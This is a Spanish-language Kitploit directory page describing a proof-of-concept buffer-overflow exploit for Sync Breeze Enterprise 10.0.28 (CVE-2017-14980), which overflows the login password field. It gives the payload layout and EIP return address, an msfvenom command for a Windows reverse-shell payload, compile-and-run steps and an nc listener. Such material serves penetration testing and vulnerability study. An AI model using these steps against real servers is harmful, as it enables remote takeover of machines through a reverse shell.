Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-14980_syncbreeze_10.0.28_bof — Exploit de desbordamiento de búfer de prueba de concepto para Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Envía un payload HTTP POST manipulado para sobrescribir EIP y ejecutar shellcode x86 personalizado para ejecución arbitraria de código. | Kitploit
Herramientas/GitHubGitHub/lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónExplotación de Binarios
GitHublipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof

CVE-2017-14980_syncbreeze_10.0.28_bof

Exploit de desbordamiento de búfer de prueba de concepto para Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Envía un payload HTTP POST manipulado para sobrescribir EIP y ejecutar shellcode x86 personalizado para ejecución arbitraria de código.

Ver Repositorio
23hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

Este repositorio contiene un exploit de desbordamiento de búfer (BOF) de prueba de concepto para Sync Breeze Enterprise versión 10.0.28, dirigido a la vulnerabilidad identificada como CVE-2017-14980.

Descripción

La vulnerabilidad existe debido a una validación de entrada inadecuada al procesar el campo password en una solicitud POST al endpoint /login.
Un atacante puede enviar un valor excesivamente largo en este campo, lo que sobrescribe el EIP y permite la ejecución de código arbitrario.

Este exploit envía una carga útil cuidadosamente elaborada que consta de:

  • 520 bytes de relleno ('A')
  • 4 bytes para sobrescribir el EIP
  • Un NOP sled de 20 bytes
  • Un shellcode de Windows x86, que puede personalizarse para ejecutar comandos arbitrarios

Cómo funciona

  1. El exploit construye un búfer malicioso que contiene el shellcode incrustado.
  2. Envía una solicitud HTTP POST al servidor vulnerable con la carga útil en el campo password.
  • Al procesar la solicitud, la aplicación sobrescribe el puntero de instrucciones (EIP) y ejecuta el shellcode proporcionado por el atacante.
  • Requisitos

    • Un compilador de C (por ejemplo, gcc)
    • Acceso de red a un objetivo que ejecute Sync Breeze Enterprise 10.0.28
    • Ajuste de la dirección EIP (\x83\x0C\x09\x10) y del shellcode si es necesario

    Ejemplo de generación de shellcode con msfvenom:

    root@kitploit:~
    msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
    
    root@kitploit:~
    gcc exploit.c -o exploit
    ./exploit
    
    
    root@kitploit:~
    nc -nlvp 4444
    
    Descargar herramienta